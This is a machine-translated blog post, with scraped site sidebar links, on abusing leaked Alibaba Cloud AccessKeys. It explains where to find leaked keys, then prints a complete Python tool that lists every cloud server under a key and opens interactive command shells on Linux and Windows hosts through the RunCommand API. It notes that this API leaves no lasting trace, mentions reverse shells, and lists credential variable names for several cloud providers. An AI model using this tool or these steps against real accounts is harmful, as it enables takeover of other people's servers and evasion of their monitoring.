当前位置:网站首页>ECS accessKey key disclosure and utilization
ECS accessKey key disclosure and utilization
2022-07-06 06:28:00 【zxl2605】
The cloud service device AccessKey Key disclosure
So far, , ECS has occupied most of the server market , Because ECS is easy to manage , Strong operability , High security . Many large manufacturers choose to deploy assets on cloud services , But at the same time, due to the negligence of the operation and maintenance personnel, it will also lead to some unexpected breakthroughs
Before reading the following, let's have a brief understanding of Cloud services AccessKey secret key , We'll take it here Alibaba cloud For example 
Log in to your Alibaba cloud account and click AccessKey management
In short, this secret key Equivalent to API call , Have full access to the account
After creation, it will generate AccessKey ID,AccessKey Secret
- AccessKeyId: Used to identify users .
- AccessKeySecret: The key used to authenticate the user .AccessKeySecret It must be kept secret .
Here we have created this key , This key may be needed in common development processes , And we usually need some information collection means to get this key
FOFA,Google Wait for the search engine
Github
Part of the development framework Debug Or error page
After getting this key during the penetration test , You can get more information from the cloud service management platform
Here we use Xingyun housekeeper for the next step : https://yun.cloudbility.com/
After login and registration, select the corresponding vendor service and write the key
Then it will scan all servers under the account , Check add and click next 
This will add all hosts under the account 
Here's the picture , You already have the administrative rights of the server , restart , close , Changing passwords is a very dangerous behavior 
What we need to do is to control the host , It is impossible to execute commands on other platforms , So we need to call the native API To execute commands on the host
Alibaba cloud API Develop links : https://next.api.aliyun.com/api/Ecs/2014-05-26/RunInstances
pip3 install aliyun-python-sdk-core
pip3 install aliyun-python-sdk-ecs
Ali cloud, API Has all the permissions of this user , By calling API We can complete a series of operations on the host in the process of infiltration
Simply list API The idea of calling , Then write API Using scripts
First, get all the host information under the current user
call API DescribeInstances
Create a command that needs to be executed
Here I use the old version API RunCommand
Because one-time return CommandId InvokeId And delete after use , Will not remain in the cloud assistant
Then complete the echo view API call DescribeInvocationResults
You can explore more functions by yourself
Here's a look at the use of the code I wrote
Scan the regional host
Linux Host command execution
Windows Command execution
rebound shell
Complete code and required Python library
pip3 install aliyun-python-sdk-core
pip3 install aliyun-python-sdk-ecs
#!/usr/bin/env python
#coding=utf-8
import json
import sys
import time
from aliyunsdkcore.client import AcsClient
from aliyunsdkcore.acs_exception.exceptions import ClientException
from aliyunsdkcore.acs_exception.exceptions import ServerException
from aliyunsdkecs.request.v20140526.DescribeInstanceStatusRequest import DescribeInstanceStatusRequest
from aliyunsdkecs.request.v20140526.DescribeRegionsRequest import DescribeRegionsRequest
from aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest
from aliyunsdkecs.request.v20140526.DescribeInvocationResultsRequest import DescribeInvocationResultsRequest
from aliyunsdkecs.request.v20140526.RunCommandRequest import RunCommandRequest
def Linux_Cmd_Exec(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, ZhuJi_ID, Zhuji_Aliyun_City_Host):
client = AcsClient(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, Zhuji_Aliyun_City_Host)
request = DescribeInstancesRequest()
request.set_accept_format('json')
InstanceId = [ZhuJi_ID]
request.set_InstanceIds(InstanceId)
response = client.do_action_with_exception(request)
response = str(response, encoding='utf-8')
print(
"""
\033[1;31m --------------------------------------------------------------------------------\033[0m
\033[1;31m - +-------+ \033[0m
\033[1;31m - | Linux | OS: %s \033[0m
\033[1;31m - | | --------> IP: %s \033[0m
\033[1;31m - | | Name: %s \033[0m
\033[1;31m - +-------+ \033[0m
\033[1;31m --------------------------------------------------------------------------------\033[0m
""" % (
json.loads(response)['Instances']['Instance'][0]['OSName'],
json.loads(response)['Instances']['Instance'][0]['PublicIpAddress']['IpAddress'][0],
json.loads(response)['Instances']['Instance'][0]['InstanceName'])
)
while True:
Cmd = str(input("\033[5;37m[[email protected]{}] \033[0m".format(ZhuJi_ID)))
if Cmd == "exit":
print("\033[1;31m- Exiting host ..... {} \033[0m".format(ZhuJi_ID))
break
Linux_exec(client, Cmd, ZhuJi_ID)
def Linux_exec(client, Cmd, ZHUJI_ID):
request = RunCommandRequest()
request.set_accept_format('json')
request.set_Type("RunShellScript")
request.set_CommandContent(Cmd)
request.set_InstanceIds([ZHUJI_ID])
request.set_Name("PeiQi")
request.set_Description("PeiQi")
request.set_Timed(False)
response = client.do_action_with_exception(request)
response = str(response, encoding='utf-8')
CommandId = json.loads(response)['CommandId']
InvokeId = json.loads(response)['InvokeId']
#print(CommandId, InvokeId)
time.sleep(1)
request = DescribeInvocationResultsRequest()
request.set_accept_format('json')
request.set_InvokeId(InvokeId)
request.set_InstanceId(ZHUJI_ID)
request.set_CommandId(CommandId)
request.set_ContentEncoding("PlainText")
response = client.do_action_with_exception(request)
response = str(response, encoding='utf-8')
Output = json.loads(response)['Invocation']['InvocationResults']['InvocationResult'][0]["Output"]
print("\033[1;32m{}\033[0m".format(Output))
def Windows_Cmd_Exec(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, ZhuJi_ID, Zhuji_Aliyun_City_Host):
client = AcsClient(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, Zhuji_Aliyun_City_Host)
request = DescribeInstancesRequest()
request.set_accept_format('json')
InstanceId = [ZhuJi_ID]
request.set_InstanceIds(InstanceId)
response = client.do_action_with_exception(request)
response = str(response, encoding='utf-8')
print(
"""
\033[1;31m --------------------------------------------------------------------------------\033[0m
\033[1;31m - +-------+ \033[0m
\033[1;31m - |Windows| OS: %s \033[0m
\033[1;31m - +-------+ --------> IP: %s \033[0m
\033[1;31m - /_______/ Name: %s \033[0m
\033[1;31m - \033[0m
\033[1;31m --------------------------------------------------------------------------------\033[0m
""" % (
json.loads(response)['Instances']['Instance'][0]['OSName'],
json.loads(response)['Instances']['Instance'][0]['PublicIpAddress']['IpAddress'][0],
json.loads(response)['Instances']['Instance'][0]['InstanceName'])
)
while True:
Cmd = str(input("\033[5;37mC:\Windows\System32> \033[0m".format(ZhuJi_ID)))
if Cmd == "exit":
print("\033[1;31m- Exiting host {}..... \033[0m".format(ZhuJi_ID))
break
Windows_exec(client, Cmd, ZhuJi_ID)
def Windows_exec(client, Cmd, ZHUJI_ID):
request = RunCommandRequest()
request.set_accept_format('json')
request.set_Type("RunBatScript")
request.set_CommandContent(Cmd)
request.set_InstanceIds([ZHUJI_ID])
request.set_Name("PeiQi")
request.set_Description("PeiQi")
request.set_Timed(False)
response = client.do_action_with_exception(request)
response = str(response, encoding='utf-8')
CommandId = json.loads(response)['CommandId']
InvokeId = json.loads(response)['InvokeId']
#print(CommandId, InvokeId)
time.sleep(1)
request = DescribeInvocationResultsRequest()
request.set_accept_format('json')
request.set_InvokeId(InvokeId)
request.set_InstanceId(ZHUJI_ID)
request.set_CommandId(CommandId)
request.set_ContentEncoding("PlainText")
response = client.do_action_with_exception(request)
response = str(response, encoding='utf-8')
Output = json.loads(response)['Invocation']['InvocationResults']['InvocationResult'][0]["Output"]
print("\033[1;32m{}\033[0m".format(Output))
# Available area scanning
def Aliyun_City_Scan(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET):
Aliyun_City = {}
client = AcsClient(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET)
request = DescribeRegionsRequest()
request.set_accept_format('json')
response = client.do_action_with_exception(request)
response = str(response, encoding='utf-8')
for i in range(0, 30):
try:
City_Host = json.loads(response)['Regions']['Region'][i]['RegionId']
City_Name = json.loads(response)['Regions']['Region'][i]['LocalName']
Aliyun_City[City_Name] = City_Host
except:
print('\033[1;34m ------ Found yes {} Alibaba cloud regions available ------\033[0m'.format(i))
break
return Aliyun_City
# Scan the controllable host under the account
def Aliyun_Number_Scan(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, Aliyun_City):
Aliyun_Serve_test_dict = []
InstanceId_List = []
for City in Aliyun_City.keys():
Aliyun_City_Host = Aliyun_City[City]
client = AcsClient(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, Aliyun_City_Host)
try:
request = DescribeInstanceStatusRequest()
request.set_accept_format('json')
response = client.do_action_with_exception(request)
response = str(response, encoding='utf-8')
Aliyun_Num = json.loads(response)['TotalCount']
if Aliyun_Num != 0:
print("\033[1;34m Scan out {} share {} Cloud servers \033[0m".format(City, Aliyun_Num))
for NUM in range(0, int(Aliyun_Num)):
InstanceId = json.loads(response)['InstanceStatuses']['InstanceStatus'][NUM]['InstanceId']
Aliyun_Serve_test(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, InstanceId, Aliyun_City_Host, NUM, Aliyun_Serve_test_dict)
InstanceId_List.append(InstanceId)
else:
print("\033[1;31m Scan out {} share {} Cloud servers \033[0m".format(City, Aliyun_Num))
except Exception as e:
print("\033[1;31m Request send failed , Please check API secret key \033[0m", e)
sys.exit(0)
print("\033[1;36m this AccessKey There are {} Cloud servers \n\033[0m".format(len(Aliyun_Serve_test_dict)))
while True:
ZhuJi_ID = str(input("\033[35m Please enter host ID Enter server :\n host ID >>> \033[0m"))
if ZhuJi_ID in InstanceId_List:
for data in Aliyun_Serve_test_dict:
if ZhuJi_ID == data['InstanceId']:
Zhuji_Aliyun_City_Host = data['Aliyun_City_Host']
Zhuji_OS = data['OS']
if Zhuji_OS == "Linux":
Linux_Cmd_Exec(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, ZhuJi_ID, Zhuji_Aliyun_City_Host)
else:
Windows_Cmd_Exec(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, ZhuJi_ID, Zhuji_Aliyun_City_Host)
else:
print("\033[1;31m Request send failed , Please check host ID Whether it is right \033[0m")
def Aliyun_Serve_test(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, InstanceId, Aliyun_City_Host, NUM, Aliyun_Serve_test_dict):
client = AcsClient(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, Aliyun_City_Host)
request = DescribeInstancesRequest()
request.set_accept_format('json')
InstanceId = [InstanceId]
request.set_InstanceIds(InstanceId)
response = client.do_action_with_exception(request)
response = str(response, encoding='utf-8')
NUM = int(NUM) + 1
OSName = json.loads(response)['Instances']['Instance'][0]['OSName']
if "Windows" in OSName:
OS = "Windows"
else:
OS = "Linux"
IpAddress_1 = json.loads(response)['Instances']['Instance'][0]['VpcAttributes']['PrivateIpAddress']['IpAddress'][0]
IpAddress_2 = json.loads(response)['Instances']['Instance'][0]['PublicIpAddress']['IpAddress'][0]
InstanceName = json.loads(response)['Instances']['Instance'][0]['InstanceName']
InstanceId = InstanceId[0]
Aliyun_Serve_test_dict.append({
"InstanceId": InstanceId,
"Aliyun_City_Host": Aliyun_City_Host,
"OS":OS
})
# Aliyun_Serve_test_dict["InstanceId"] = InstanceId
# Aliyun_Serve_test_dict["Aliyun_City_Host"] = Aliyun_City_Host
# Aliyun_Serve_test_dict["OS"] = OS
print("\033[1;34m ({}) host ID: {} System name : {} \n Extranet IP: {}\n Intranet IP: {} \n Server name : {}\n \033[0m".format(NUM, InstanceId, OSName, IpAddress_2, IpAddress_1, InstanceName))
if __name__ == '__main__':
ALIYUN_ACCESSKEYID = "xxxxxxxxxxxxx"
ALIYUN_ACCESSKEYSECRET = "xxxxxxxxxxxxxxxxxxxxxx"
Aliyun_City = Aliyun_City_Scan(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET)
InstanceId_List = Aliyun_Number_Scan(ALIYUN_ACCESSKEYID, ALIYUN_ACCESSKEYSECRET, Aliyun_City)
common Access Key name
Alibaba cloud
ALIYUN_ACCESSKEYID
ALIYUN_ACCESSKEYSECRET
Tencent cloud
SecretId
SecretKey
AWS
AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
Qingyun
qy_access_key_id
qy_secret_access_key
Reference articles :https://www.freebuf.com/articles/web/255717.html
边栏推荐
- D - How Many Answers Are Wrong
- Data type of MySQL
- Black cat takes you to learn UFS protocol Chapter 4: detailed explanation of UFS protocol stack
- mysql按照首字母排序
- How to extract login cookies when JMeter performs interface testing
- Difference between backtracking and recursion
- 论文翻译英译中,怎样做翻译效果好?
- Apple has open source, but what about it?
- Defense (greed), FBI tree (binary tree)
- 翻译影视剧字幕,这些特点务必要了解
猜你喜欢
职场进阶指南:大厂人必看书籍推荐
Transfert des paramètres de la barre d'adresse de la page de liste basée sur jeecg - boot
全链路压测:构建三大模型
Customize the gateway filter factory on the specified route
Full link voltage measurement: building three models
论文翻译英译中,怎样做翻译效果好?
Career advancement Guide: recommended books for people in big factories
![[mqtt from getting started to improving series | 01] quickly build an mqtt test environment from 0 to 1](/img/03/3727e0ddf2e8e61e500c6e4d989c00.png)
[mqtt from getting started to improving series | 01] quickly build an mqtt test environment from 0 to 1
在uni-app中使用腾讯视频插件播放视频
B - The Suspects
随机推荐
B - The Suspects
模拟卷Leetcode【普通】1405. 最长快乐字符串
Career advancement Guide: recommended books for people in big factories
Engineering organisms containing artificial metalloenzymes perform unnatural biosynthesis
Black cat takes you to learn UFS protocol Chapter 4: detailed explanation of UFS protocol stack
mysql按照首字母排序
Past and present lives of QR code and sorting out six test points
oscp raven2靶机渗透过程
keil MDK中删除添加到watch1中的变量
Data type of MySQL
JWT-JSON WEB TOKEN
Transfert des paramètres de la barre d'adresse de la page de liste basée sur jeecg - boot
端午节快乐Wish Dragon Boat Festival is happy
云服务器 AccessKey 密钥泄露利用
Mise en œuvre d’une fonction complexe d’ajout, de suppression et de modification basée sur jeecg - boot
MFC 动态创建的对话框及改变控件的大小和位置
LeetCode 739. Daily temperature
调用链监控Zipkin、sleuth搭建与整合
模拟卷Leetcode【普通】1447. 最简分数
基於JEECG-BOOT的list頁面的地址欄參數傳遞